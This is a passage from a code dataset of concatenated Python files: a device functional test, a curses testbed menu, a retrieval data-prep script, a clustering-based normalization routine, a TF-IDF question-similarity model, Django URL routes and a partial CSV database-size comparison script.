bootup timestamp {} to be > start time {}\".format(\n timestamp, start_time))\n\n def _verify_expect_log(self):\n \"\"\"Verifies that 'known_logline' occurs in device logs.\"\"\"\n self.logger.info(\"Expecting logline %r\", self.test_config[\"known_logline\"])\n res = self.device.switchboard.expect([self.test_config[\"known_logline\"]],\n timeout=30)\n self.assertFalse(\n res.timedout,\n \"Expect timed out when waiting for log line {!r}. 
Shell response: {}\"\n .format(self.test_config[\"known_logline\"], res.before))\n\n def _verify_no_unexpected_reboots(self, start_time):\n \"\"\"Verifies that no unexpected reboots occurred after start_time.\"\"\"\n bootups = self.device.event_parser.get_unexpected_reboots()\n unexpected_timestamps = [event[\"system_timestamp\"]\n for event in bootups\n if event[\"system_timestamp\"] > start_time]\n self.assertFalse(\n unexpected_timestamps,\n \"There were {} unexpected bootups after {} at {}\".format(\n len(unexpected_timestamps), start_time, unexpected_timestamps))\n\n\nif __name__ == \"__main__\":\n gdm_test_base.main()\n","sub_path":"gazoo_device/tests/functional_tests/common_test_suite.py","file_name":"common_test_suite.py","file_ext":"py","file_size_in_byte":10582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"86759132","text":"'''\nThe frontend of the testserver gui.\n'''\n\nimport curses\n\nAUTHOR = \"Sol O.\"\nOPT_SELECTED_DELAYMS = 1000\n\n\nclass MenuItem:\n def __init__(self, name: str, x_pos, y_pos, initial_text=\" \", final_text=\" ->\"):\n self.name = name\n self.x_pos = x_pos\n self.y_pos = y_pos\n\n self.initial_text = initial_text\n self.final_text = final_text\n\n def get_title_str(self, uppercase=True):\n ret_val = \"\"\n if self.initial_text is not None:\n ret_val += self.initial_text\n\n if uppercase:\n ret_val += self.name.upper()\n else:\n ret_val += self.name\n\n if self.final_text is not None:\n ret_val += self.final_text\n return ret_val\n\n\nclass GUI:\n def __init__(self, testrunner=None, testing=True): # modified for our purposes.\n # def __init__(self, testing=True): #This is the generic one.\n if testing is True:\n print(\"Starting GUI in testing mode.\")\n self.testing = testing\n self.testrunner = testrunner\n\n self.board_list = []\n self.rev_list = []\n # allow the option to include config file while testing. Should throw an error if no config file specified in normal mode.\n if ((self.testing is True) and (self.testrunner is None)):\n # fake values for easy testing.\n self.config_file = \"Testing\"\n self.board_list = ['fake1', 'fake2', 'fake3', 'fake4', 'fake5']\n self.rev_list = ['REV1', 'REV2', 'REV3', 'REV4', 'REV5', 'REV6'] # NOTE: This is not how this normally works.... will not be a single, static list but a list per board above.\n else:\n self.config_file = self.testrunner.config.cfg_filename\n self.board_list = self.testrunner.config.get_board_list()\n\n self.height = 0 # MUST be set with stdscr.getmaxyx() in gui_init()\n self.width = 0 # MUST be set with stdscr.getmaxyx() in gui_init()\n self.page_name = \"GUI\"\n\n # These should be adjusted to reflect other GUI elements such as the title bar, etc.\n self.const_maxX = 0\n self.const_maxY = 1\n # Same as above... must also be added to const_min/Y once the maxX/Y is obtained each frame.\n self.const_lowerXoffset = 1\n self.const_lowerYoffset = -2\n\n self.volatile_minX = self.width # must also be set on getting max XY\n self.volatile_minY = self.height # must also be set on getting max XY.\n\n self.cursor_x = self.const_maxX # This shoudln't change at all. 
L/R keystrokes move up and down menus.\n self.cursor_y = self.const_maxY\n\n self.title = \"Should be set by gui_refresh()\"\n self.subtitle = \"Should be set by gui_refresh()\"\n self.statusbarstr = \"Should be set by gui_refresh()\"\n\n def load_list_elements(self, element_list: list, initial_text=\" \", final_text=None):\n '''takes a list of strings and turns them into a list of MenuItem instances,\n starts at topmost available y value and moves down, aligned '''\n counter = 0\n ret_list = []\n for item in element_list:\n ret_list.append(MenuItem(item, self.const_maxX, (self.const_maxY + counter), initial_text=initial_text, final_text=final_text))\n counter += 1\n return ret_list\n\n def gui_refresh(self, stdscr):\n # Initialization\n stdscr.clear()\n self.height, self.width = stdscr.getmaxyx()\n self.volatile_minX = self.width + self.const_lowerXoffset\n self.volatile_minY = self.height + self.const_lowerYoffset\n\n # standard page strings and header text\n self.title = \"BSI Testbed {}\".format(self.page_name)[:self.width - 1]\n self.subtitle = \"Written by {}\".format(AUTHOR)[:self.width - 1]\n self.statusbarstr = \"Press 'q' to exit | STATUS BAR | Configuration: {}\".format(self.config_file)[\n :self.width - 1]\n\n \"\"\"\n Must refresh GUI before drawing common elements to ensure the window size hasn't changed.\n \"\"\"\n def draw_common_elements(self, stdscr):\n # Centering calculations\n start_x_title = int((self.width // 2) - (len(self.title) // 2) - len(self.title) % 2)\n start_x_subtitle = int((self.width // 2) - (len(self.subtitle) // 2) - len(self.subtitle) % 2)\n # start_y_title = int((self.height // 2) - 2)\n start_y_title = int(0)\n\n # Render status bar\n stdscr.attron(curses.color_pair(2))\n stdscr.addstr(self.height - 1, 0, self.statusbarstr)\n stdscr.addstr(self.height - 1, len(self.statusbarstr), \" \" * (self.width - len(self.statusbarstr) - 1))\n stdscr.attroff(curses.color_pair(2))\n\n # Turning on attributes for title\n stdscr.attron(curses.color_pair(3))\n stdscr.attron(curses.A_BOLD)\n # Rendering title\n stdscr.addstr(start_y_title, start_x_title, self.title)\n # Render bar before title\n stdscr.addstr(start_y_title, 0, \" \" * (((self.width - len(self.title)) // 2) - 1))\n # Render bar after title\n stdscr.addstr(start_y_title, (start_x_title + len(self.title)), \" \" * (((self.width - len(self.title)) // 2) - 0))\n # Turning off attributes for title\n stdscr.attroff(curses.color_pair(3))\n stdscr.attroff(curses.A_BOLD)\n\n # Print rest of text\n # stdscr.addstr(start_y_title + 1, start_x_subtitle, self.subtitle)\n # stdscr.addstr(start_y_title + 3, (self.width // 2) - 2, '-' * 4)\n # stdscr.addstr(start_y_title + 5, start_x_keystr, keystr)\n # stdscr.addstr(start_y_title + 6, (width // 2), l_r_str)\n stdscr.move(self.cursor_y, self.cursor_x)\n\n def draw_menu(self, list_of_elements, stdscr):\n \"\"\"Once an element list has been parsed by load_menu_items(), use draw_menu_items()\n to draw the menu items from the created MenuItem instances\"\"\"\n stdscr.attron(curses.color_pair(1))\n for item in list_of_elements:\n if self.cursor_y == item.y_pos:\n stdscr.attroff(curses.color_pair(1))\n stdscr.attron(curses.color_pair(2))\n stdscr.addstr(item.y_pos, item.x_pos, (item.get_title_str() + (\" \" * (self.width - len(item.get_title_str())))))\n #stdscr.addnstr(item.y_pos, item.x_pos, (item.get_title_str() + (\" \" * (self.width - len(item.get_title_str())))))\n stdscr.attroff(curses.color_pair(2))\n stdscr.attron(curses.color_pair(1))\n else:\n 
stdscr.addstr(item.y_pos, item.x_pos, (item.get_title_str() + (\" \" * (self.width - len(item.get_title_str())))))\n stdscr.attroff(curses.color_pair(1))\n\n def test_menu_enter_handler(self, stdscr, name):\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(self.volatile_minY, 0, \"Selected IteM: {}\".format(name))\n stdscr.attroff(curses.color_pair(1))\n\n def main_menu_enter_handler(self, stdscr, name):\n # only accept no testrunner if testing is set to true.\n if (self.testing is True) and (self.testrunner is None):\n self.sub_menu(stdscr, name, self.rev_list)\n else:\n revs = self.testrunner.config.get_rev_list(name)\n # get_rev_list will return None if there's no revisions in the yaml file.\n if revs is None:\n revs = [\"No board revisions found.\"]\n self.sub_menu(stdscr, name, revs)\n\n def board_menu_enter_handler(self, stdscr, name):\n if (self.testing is True):\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(self.volatile_minY, 0, \"Selected IteM: {}\".format(name))\n stdscr.attroff(curses.color_pair(1))\n else:\n return name\n\n# TODO: the status messages printed here are not ideal. need to make sure the formatting makes sense.\n def menu_enter(self, stdscr, current_menu_items, enter_handler):\n for item in current_menu_items:\n if item.y_pos == self.cursor_y:\n return item.name, enter_handler(stdscr, item.name)\n else:\n continue\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(self.volatile_minY, 0, \"Nothing selected!\")\n stdscr.attroff(curses.color_pair(1))\n\n def sub_menu(self, stdscr, name, menu_element_list):\n self.page_name = name\n parent_item = name\n k = 0\n flag_back = False\n flag_fwd = False\n self.cursor_x = self.const_maxX\n self.cursor_y = self.const_maxY\n\n self.gui_refresh(stdscr)\n self.draw_common_elements(stdscr)\n self.statusbarstr = \"Press the 'back' arrow twice to go back | STATUS BAR | Configuration: {}\".format(self.testrunner.config.cfg_filename)[\n :self.width - 1]\n\n current_menu_items = self.load_list_elements(menu_element_list, initial_text=\" - \", final_text=\" | |\")\n\n while (k != curses.KEY_LEFT):\n\n flag_back = False\n flag_fwd = False\n\n if k == curses.KEY_LEFT:\n #curses.flash()\n flag_back = True\n elif k == ord('q'):\n quit()\n elif k == curses.KEY_RIGHT:\n flag_fwd = True\n #stdscr.attron(curses.color_pair(1))\n #stdscr.addstr(int((self.height / 2 + 3)), 0, \"Right key pressed\")\n #stdscr.attroff(curses.color_pair(1))\n elif k == curses.KEY_DOWN:\n self.cursor_y = self.cursor_y + 1\n elif k == curses.KEY_UP:\n self.cursor_y = self.cursor_y - 1\n\n # check new coordinates against designated max/min values\n self.cursor_x = max(self.const_maxX, self.cursor_x)\n self.cursor_x = min(self.volatile_minX, self.cursor_x)\n\n self.cursor_y = max(self.const_maxY, self.cursor_y)\n self.cursor_y = min(self.volatile_minY, self.cursor_y)\n\n self.gui_refresh(stdscr)\n self.statusbarstr = \"Press the 'back' arrow to go back | Press 'q' to Quit. | Configuration: {}\".format(\n self.config_file)[:self.width - 1]\n self.draw_menu(current_menu_items, stdscr)\n self.draw_common_elements(stdscr)\n\n if flag_back is True:\n return\n if flag_fwd is True:\n if self.testing is True:\n self.menu_enter(stdscr, current_menu_items, self.test_menu_enter_handler)\n else:\n #TODO: this is sus. 
Make sure it works with boards with no revision.\n #stdscr.clear()\n revtup = (self.menu_enter(stdscr, current_menu_items, self.board_menu_enter_handler))\n try:\n rev = revtup[0] # have to do this because menu_enter will return a tuple in this case.\n except:\n rev = None\n if rev is not None:\n stdscr.erase()\n stdscr.attron(curses.color_pair(1))\n selected_opt_msg = \"Selected board: {}, rev: {}\".format(parent_item, str(rev))\n stdscr.addstr(self.height//2, ((self.width//2) - (len(selected_opt_msg)//2)), selected_opt_msg)\n stdscr.attroff(curses.color_pair(1))\n stdscr.refresh()\n curses.delay_output(OPT_SELECTED_DELAYMS)\n curses.endwin()\n #stdscr.clear()\n #stdscr.refresh()\n self.testrunner.run_test(parent_item, rev)\n\n self.gui_refresh(stdscr)\n self.statusbarstr = \"Press the 'back' arrow to go back | Press 'q' to Quit. | Configuration: {}\".format(\n self.config_file)[:self.width - 1]\n self.draw_menu(current_menu_items, stdscr)\n self.draw_common_elements(stdscr)\n \"\"\"stdscr.attron(curses.color_pair(1))\n stdscr.addstr(int((self.height - 3)), 0, \"Right key pressed\")\n stdscr.attroff(curses.color_pair(1))\"\"\"\n\n # Refresh the screen\n stdscr.refresh()\n # Wait for next input\n k = stdscr.getch()\n\n def main_menu(self, stdscr):\n self.page_name = \"Main Menu\"\n k = 0\n flag_back = False\n flag_fwd = False\n self.cursor_x = self.const_maxX\n self.cursor_y = self.const_maxY\n\n self.gui_refresh(stdscr)\n self.draw_common_elements(stdscr)\n\n element_list = self.load_list_elements(self.board_list, final_text=\" -->\")\n\n while (k != ord('q')):\n self.page_name = \"Main Menu\"\n flag_back = False\n flag_fwd = False\n\n if k == curses.KEY_LEFT:\n #curses.flash()\n flag_back = True\n elif k == curses.KEY_RIGHT:\n flag_fwd = True\n #stdscr.attron(curses.color_pair(1))\n #stdscr.addstr(int((self.height / 2 + 3)), 0, \"Right key pressed\")\n #stdscr.attroff(curses.color_pair(1))\n elif k == curses.KEY_DOWN:\n self.cursor_y = self.cursor_y + 1\n elif k == curses.KEY_UP:\n self.cursor_y = self.cursor_y - 1\n\n # check new coordinates against designated max/min values\n self.cursor_x = max(self.const_maxX, self.cursor_x)\n self.cursor_x = min(self.volatile_minX, self.cursor_x)\n\n self.cursor_y = max(self.const_maxY, self.cursor_y)\n self.cursor_y = min(self.volatile_minY, self.cursor_y)\n\n self.gui_refresh(stdscr)\n self.draw_menu(element_list, stdscr)\n self.draw_common_elements(stdscr)\n\n if flag_back is True:\n curses.flash()\n if flag_fwd is True:\n self.menu_enter(stdscr, element_list, self.main_menu_enter_handler)\n \"\"\"stdscr.attron(curses.color_pair(1))\n stdscr.addstr(int((self.height - 3)), 0, \"Right key pressed\")\n stdscr.attroff(curses.color_pair(1))\"\"\"\n\n # Refresh the screen\n stdscr.refresh()\n # Wait for next input\n k = stdscr.getch()\n\n def init_gui(self, stdscr):\n self.height, self.width = stdscr.getmaxyx() # getmaxyx() returns (rows, cols), matching gui_refresh()\n\n # Clear and refresh the screen for a blank canvas\n stdscr.clear()\n stdscr.refresh()\n\n # Start colors in curses\n curses.start_color()\n curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK) # background/list item color\n #curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK) # old\n curses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_WHITE) # Status bar/selected item color\n curses.init_pair(3, curses.COLOR_CYAN, curses.COLOR_BLUE) # title color\n\n self.main_menu(stdscr)\n\n def start_gui(self):\n curses.wrapper(self.init_gui)\n\n\nif __name__ == \"__main__\":\n app = GUI()\n 
app.start_gui()\n","sub_path":"app/gui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":15114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"454344108","text":"import re\nimport argparse\nimport subprocess\nimport json\nfrom tqdm import tqdm\nfrom pathlib import Path\nimport nltk\nimport numpy as np\nimport random\n\n\ndef count_file_lines(file_path):\n \"\"\"\n Counts the number of lines in a file using wc utility.\n :param file_path: path to file\n :return: int, no of lines\n \"\"\"\n num = subprocess.check_output(['wc', '-l', file_path])\n num = num.decode('utf-8').split(' ')\n return int(num[0])\n\n\ndef main(args):\n Path(args.out_dir).mkdir(parents=True, exist_ok=True)\n\n with open(args.retrieved_code_file) as f:\n retrieved_code = json.load(f)\n\n src_writer = open('{}/{}.source'.format(args.out_dir, args.split), 'w', encoding='utf8')\n tgt_writer = open('{}/{}.target'.format(args.out_dir, args.split), 'w', encoding='utf8')\n\n print(\"topk: \", args.top_k, \" args.UNION: \", args.UNION, flush=True)\n\n def write(source1, target, src_writer=src_writer, tgt_writer=tgt_writer, source2=None):\n source = re.sub(\"[\\n\\r\\t ]+\", \" \", source1)\n target = re.sub(\"[\\n\\r\\t ]+\", \" \", target)\n src_writer.write(source + '\\n')\n tgt_writer.write(target + '\\n')\n\n if source2:\n src_writer.write(source2 + '\\n')\n tgt_writer.write(target + '\\n')\n\n\n\n for idx, ex in enumerate(tqdm(retrieved_code, total=len(retrieved_code))):\n\n try:\n source = ex['question']\n except:\n ex = retrieved_code[ex]\n\n source = ex['question']\n target = ex['answers']\n # assert len(ex['ctxs']) >= args.top_k\n\n\n if (args.top_k<0 or args.NO_CONCODE_VARS) :\n source = source.split('concode_field_sep')[0]\n if args.top_k > 0:\n inserted = 0\n # for rank, ctx in enumerate(ex['ctxs'][:args.top_k]):\n for rank, ctx in enumerate(ex['ctxs']):\n # if \"test.json\" not in ctx[\"id\"] and target.strip()!=ctx[\"text\"].strip(): #for retrieving without test corpus\n if args.WITH_OR_WITHOUT_REF==\"with\": #for retrieving without ref code but includes other codes in the test corpus\n source += ' _CODE_SEP_ ' + ctx[\"text\"].split('_NL_')[0].strip()\n inserted+=1\n if inserted>= args.top_k:\n break\n else:\n if target.strip() != ctx[\"text\"].strip().split('_NL_')[0].strip():\n source += ' _CODE_SEP_ ' + ctx[\"text\"].split('_NL_')[0].strip()\n inserted += 1\n if inserted >= args.top_k:\n break\n\n\n source = re.sub(\"[\\n\\r\\t ]+\", \" \", source)\n target = re.sub(\"[\\n\\r\\t ]+\", \" \", target)\n src_writer.write(source + '\\n')\n tgt_writer.write(target + '\\n')\n\n src_writer.close()\n tgt_writer.close()\n\n print(\"written to: \", src_writer)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--retrieved_code_file\", required=True, help='path to .json file')\n parser.add_argument(\"--split\", required=True, choices=['train', 'valid', 'test'])\n parser.add_argument(\"--top_k\", type=int, default=0, help='number of retrieved code to consider, -1 means only NL before concode_field_sep')\n parser.add_argument(\"--out_dir\", required=True, help='directory path to save data')\n parser.add_argument(\"--mask_rate\", type=float, help='masking words ratio', default=0.15)\n parser.add_argument(\"--NO_CONCODE_VARS\", action=\"store_true\", help='Do not use concode_field_sep variables')\n parser.add_argument(\"--UNION\", action=\"store_true\", help='UNION of Retrieved and gold vars')\n 
parser.add_argument(\"--ONLY_RETRIEVAL\", action=\"store_true\", help='ONLY_RETRIEVED CODE will be used as source')\n parser.add_argument(\"--dag\", action=\"store_true\", help='ONLY_RETRIEVED CODE will be used as source')\n parser.add_argument(\"--WITH_OR_WITHOUT_REF\", type=str, help='WITH_OR_WITHOUT_REF')\n args = parser.parse_args()\n # print(\"args: \", flush=True)\n # print(\"--\"*50, flush=True)\n # print(args, flush=True)\n # print(\"--\" * 50, flush=True)\n main(args)","sub_path":"SCODE-G/text_to_code/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"324202747","text":"from __future__ import print_function\r\n\r\nimport argparse\r\n\r\nimport torch\r\n\r\nimport torch.nn as nn\r\n\r\nimport torch.nn.functional as F\r\n\r\nimport torch.optim as optim\r\n\r\nfrom torchvision import datasets, transforms\r\n\r\nfrom group_norm import *\r\n\r\nfrom torch.utils.data import DataLoader, Dataset, TensorDataset\r\n\r\nfrom gamma_correction import *\r\n\r\nfrom Clustering import *\r\n\r\nimport random\r\n\r\nimport os\r\n\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\n\r\n\r\ndef GN_w_BN_f(x, G, eps=1e-5, flag=True):\r\n use_cuda = torch.cuda.is_available()\r\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\r\n rem_grad = x.grad\r\n x = x.cpu()\r\n x_np = x.detach().numpy()\r\n #x_np = x\r\n Nabs, C, H, W = x_np.shape\r\n if flag:\r\n N = Nabs\r\n #x_np_tmp = x.detach().numpy()\r\n res_x = np.zeros((N, C, H, W))\r\n x_np_new = np.zeros((C, N * H * W))\r\n # tmpp = np.zeros((N, H*W))\r\n for i in range(C):\r\n x_np_new[i, :] = np.reshape(x_np[:, i, :, :], (1, N * H * W))\r\n # x_np_new = np.reshape(x_np, (C, N*H*W))\r\n # x_np = x_np.transpose()\r\n image_vector = np.asarray(x_np_new)\r\n Data = data_preparation(n_cluster=G, data=image_vector[:, :])\r\n for val in range(G):\r\n inx = np.argwhere(Data.labels_ == val)\r\n tmp = np.zeros((1, N * H * W * inx.shape[0]))\r\n for idx, idxx in enumerate(inx):\r\n tmp[0, idx * N * H * W:(idx + 1) * N * H * W] = x_np_new[idxx[0], :]\r\n mu = np.mean(tmp)\r\n sigma = np.std(tmp)\r\n for idx, idxx in enumerate(inx):\r\n tmppp = (x_np_new[idxx[0], :] - mu) / np.sqrt(sigma + eps)\r\n for j in range(N):\r\n tmpp = tmppp[j * H * W:(j + 1) * H * W]\r\n res_x[j, idxx[0], :, :] = np.reshape(tmpp, (H, W))\r\n\r\n else:\r\n N = 1\r\n res_x = np.zeros((Nabs, C, H, W))\r\n for ii in range(Nabs):\r\n res_x_tmp = np.zeros((N, C, H, W))\r\n x_np_new = np.zeros((C, N*H*W))\r\n #tmpp = np.zeros((N, H*W))\r\n for i in range(C):\r\n x_np_new[i, :] = np.reshape(x_np[ii, i, :, :], (1, N*H*W))\r\n #x_np_new = np.reshape(x_np, (C, N*H*W))\r\n #x_np = x_np.transpose()\r\n image_vector = np.asarray(x_np_new)\r\n Data = data_preparation(n_cluster=G, data=image_vector[:, :])\r\n for val in range(G):\r\n inx = np.argwhere(Data.labels_ == val)\r\n tmp = np.zeros((1, N*H*W*inx.shape[0]))\r\n for idx, idxx in enumerate(inx):\r\n tmp[0, idx*N*H*W:(idx+1)*N*H*W] = x_np_new[idxx[0], :]\r\n mu = np.mean(tmp)\r\n sigma = np.std(tmp)\r\n for idx, idxx in enumerate(inx):\r\n tmppp = (x_np_new[idxx[0], :] - mu) / np.sqrt(sigma + eps)\r\n for j in range(N):\r\n tmpp = tmppp[j*H*W:(j+1)*H*W]\r\n res_x_tmp[j, idxx[0], :, :] = np.reshape(tmpp, (H, W))\r\n res_x[ii, :, :, :] = res_x_tmp\r\n Res_x = torch.from_numpy(res_x)\r\n Res_x.grad = rem_grad\r\n Res_x = Res_x.to(device)\r\n return 
Res_x\r\n\r\n\r\n\r\n","sub_path":"GN_w_BN.py","file_name":"GN_w_BN.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"67010885","text":"import numpy as np\nimport pandas as pd\nimport cPickle\nimport os\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ncategories = ['alt.atheism', 'soc.religion.christian', 'comp.graphics', 'sci.med']\n\n# twenty_train = fetch_20newsgroups(subset='train',\n    # categories=categories, shuffle=True, random_state=42)\n\n# count_vect = CountVectorizer()\n# X_train_counts = count_vect.fit_transform(twenty_train.data)\n\n# tf_transformer = TfidfTransformer().fit(X_train_counts)\n\n# qs = [\"Where is a zebra?\", \"What is a zebra?\"]\n# qsT = tf_transformer.transform(count_vect.transform(qs))\n# print(qsT)\n# print(np.shape(qsT))\n# qComp = cosine_similarity(qsT)\n# print(qComp)\n\ndef TFIDF(questions):\n    tfidf, count = createOrLoadModel()\n\n    qT = tfidf.transform(count.transform(questions))\n    return qT\n\ndef cosSim(q1TF, q2TF):\n    cosSim = cosine_similarity(q1TF, q2TF)[0][0]\n    return (cosSim >= 0.5)\n\ndef createOrLoadModel():\n    if os.path.exists('TFIDF.cpickle'):\n        print('FOUND MODEL')\n        with open('TFIDF.cpickle') as f:\n            tfidf = cPickle.load(f)\n        with open('COUNT.cpickle') as f:\n            count = cPickle.load(f)\n\n        return tfidf, count\n    else:\n        print('NEW MODEL')\n        df = pd.read_csv(\"quora_duplicate_questions.tsv\", delimiter='\\t')\n\n        # encode questions to unicode\n        df['question1'] = df['question1'].apply(lambda x: unicode(str(x),\"utf-8\"))\n        df['question2'] = df['question2'].apply(lambda x: unicode(str(x),\"utf-8\"))\n\n        # allQuestions = np.concatenate((df['question1'].values, df['question2'].values))\n        # allSimilarities = np.concatenate((df['is_duplicate'].values, df['is_duplicate'].values))\n        # dataSize = np.shape(allQuestions)\n        trainPercent = 0.8\n        # trainSize = np.shape(allQuestions)[0] * trainPercent\n        # trainDataX = allQuestions[:trainSize]\n        # slice bounds must be integers; the fractional split point has to be truncated\n        trainDataQ1 = df['question1'].values[:int(np.shape(df['question1'])[0] * trainPercent)]\n        trainDataQ2 = df['question2'].values[:int(np.shape(df['question2'])[0] * trainPercent)]\n        trainDataSim = df['is_duplicate'].values[:int(np.shape(df['is_duplicate'])[0] * trainPercent)]\n\n        testDataQ1 = df['question1'].values[int(np.shape(df['question1'])[0] * trainPercent):]\n        testDataQ2 = df['question2'].values[int(np.shape(df['question2'])[0] * trainPercent):]\n        testDataSim = df['is_duplicate'].values[int(np.shape(df['is_duplicate'])[0] * trainPercent):]\n        # rx = re.compile('\\\W+')\n        # for i in trainDataX:\n        #     if len(i) > 100:\n        #         res = rx.sub(' ', i).strip()\n        #         trainDataX2.append(res)\n\n        # trainDataX = trainDataX2\n        # print(\"size of train: {}\".format(np.shape(trainDataX)))\n        # testDataX = allQuestions[trainSize:]\n        # testDataY = allSimilarities[trainSize:]\n        # print(testDataY)\n        # print(\"size of test: {}\".format(np.shape(testDataX)))\n        # print(type(trainDataX))\n        print(np.shape(testDataQ1))\n        print(np.shape(testDataQ2))\n        print(np.shape(testDataSim))\n\n        trainDataQs = np.concatenate((trainDataQ1, trainDataQ2))\n        count_vect = CountVectorizer()\n        X_train_counts = count_vect.fit_transform(trainDataQs)\n        tfidfTrans = TfidfTransformer(smooth_idf=False)\n        tfidfTrans.fit_transform(X_train_counts)\n\n        # TEST\n        #CALC Q1\n        q1T = 
tfidfTrans.transform(count_vect.transform(testDataQ1))\n        print(np.shape(q1T))\n        #CALC Q2\n        q2T = tfidfTrans.transform(count_vect.transform(testDataQ2))\n        print(np.shape(q2T))\n        #PERFORM cosine similarity\n        probThresh = 0.5\n        numCorrect = 0\n        for i in range(0, np.shape(q1T)[0]):\n            aCos = cosine_similarity(q1T[i, :], q2T[i, :])\n            # classify as duplicate when similarity reaches the probability threshold\n            pred = int(aCos[0][0] >= probThresh)\n            # print(aCos[0][0])\n            # print(pred)\n            # print(testDataSim[i])\n            # print('---------------------------------')\n            if pred == testDataSim[i]:\n                numCorrect += 1\n            # print(aCos)\n            # print('--------------------------')\n        print(\"correct num: {}\".format(numCorrect))\n        accuracy = float(numCorrect) / float(np.shape(q1T)[0])\n        print(\"accuracy: {}\".format(accuracy))\n\n        # save the model\n        with open('TFIDF.cpickle', 'wb') as f:\n            cPickle.dump(tfidfTrans, f)\n        with open('COUNT.cpickle', 'wb') as f:\n            cPickle.dump(count_vect, f)\n\n        return tfidfTrans, count_vect\n","sub_path":"Website/Python_connects/questionProcessing.py","file_name":"questionProcessing.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"148714552","text":"# coding=utf-8\n\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom web.auth import AuthView\n\n\nadmin.autodiscover()\n\nurlpatterns = patterns(\n    '',\n    # Examples:\n    # url(r'^$', 'nami.views.home', name='home'),\n    # url(r'^nami/', include('nami.foo.urls')),\n\n    # Uncomment the admin/doc line below to enable admin documentation:\n    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n    # Uncomment the next line to enable the admin:\n    url(r'^admin/', include(admin.site.urls)),\n    url(r'^m/', include('m.urls')),\n    url(r'^api/v1/', include('api_v1.urls')),\n    url(r'^$', 'web.page.root'),\n)\n\nurlpatterns += patterns(\n    'web.auth',\n    url(r'^auth/login$', AuthView.as_view()),\n)\n\n\nurlpatterns += patterns(\n    'web.page',\n    url(r'^one$', 'one'),\n    url(r'^ng/transactions$', 'ng_transactions'),\n    url(r'^ng/accounts$', 'ng_accounts'),\n    url(r'^ng/repeats$', 'ng_repeats'),\n    url(r'^ng/accounts$', 'ng_accounts'),\n    # the named-group identifiers were lost in this dump; 'pk' is a placeholder name\n    url(r'^ng/account/(?P<pk>\\d+)$', 'ng_account'),\n    url(r'^ng/transaction_shadows$', 'ng_transaction_shadows'),\n    url(r'^ng/transaction_shadows/paste$', 'ng_transaction_shadows_paste'),\n)\n\nurlpatterns += patterns(\n    'web.account',\n    #url(r'^accounts$', 'list_'),\n    url(r'^accounts/create$', 'create'),\n    #url(r'accounts/(?P<pk>\\d+)/transactions$', 'transactions'),\n    url(r'^accounts/(?P<pk>\\d+)/edit$', 'edit'),\n    url(r'^accounts/(?P<pk>\\d+)/transactions/multi-edit$',\n        'transactions_multi_edit'),\n)\n\nurlpatterns += patterns(\n    'web.transaction',\n    url(r'transactions/create$', 'create'),\n    url(r'transactions/(?P<pk>\\d+)/edit$', 'edit'),\n)\n\nurlpatterns += patterns(\n    'web.repeat',\n    # url(r'repeats/transactions$', 'transactions'),\n)\n","sub_path":"nami/nami/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"246200347","text":"import csv\nimport math\nimport os\nfrom datetime import date\nfrom os import walk\n\nfilenames = []\n\ndef get_files():\n    # gets the list of .csv files in the current directory\n    # and sorts them by date in ascending order\n    for (_, _, names) in walk(\".\"):\n        for name in names:\n            _file = {}\n            if '.csv' in name:\n                _file['name'] = name\n                _file['date'] = date.fromisoformat(str(name[:-4]))\n                filenames.append(_file)\n                continue\n    filenames.sort(key=lambda _file: 
_file['date'])\n    if len(filenames) != 2:\n        raise Exception('Wrong number of files in the directory')\n\n\ndef normalize_data_size(input_dict):\n    # normalizes a table size string such as '12 MB' to an integer number of bytes\n    #units = {\"B\": 1, \"kB\": 10**3, \"MB\": 10**6, \"GB\": 10**9, \"TB\": 10**12}\n    units = {\"B\": 1, \"kB\": 2**10, \"MB\": 2**20, \"GB\": 2**30, \"TB\": 2**40}\n    number, unit = [string.strip() for string in input_dict.split()]\n    return int(float(number)*units[unit])\n\n\ndef human_readable_size(size):\n    power = 2**10\n    n = 0\n    power_labels = {0: '', 1: 'kB', 2: 'MB', 3: 'GB', 4: 'TB'}\n    if size < 0:\n        msize = math.fabs(size)\n        while msize > power:\n            msize /= power\n            n += 1\n        return f\"{format(-msize, '.2f')} {power_labels[n]}\"\n    else:\n        while size > power:\n            size /= power\n            n += 1\n        return f\"{format(size, '.2f')} {power_labels[n]}\"\n\n\ndef create_dict(input_file):\n    # builds a list of dicts of the form [{\"db_name\": name, date: size}]\n    result = []\n    with open(input_file['name'], 'r') as csvfile:\n        filereader = csv.DictReader(csvfile)\n        db_date = str(input_file['date'])\n        for row in filereader:\n            result.append({'db_name': row['database_name'], db_date: row['size']})\n    return result\n\n\ndef create_set_of_names(*args):\n    # builds a sorted list of the unique database names across the input files\n    set_of_names = set()\n    for input_file in args:\n        with open(input_file, 'r') as csvfile:\n            filereader = csv.DictReader(csvfile)\n            for row in filereader:\n                set_of_names.add(row['database_name'])\n    list_of_names = sorted(set_of_names)\n    return 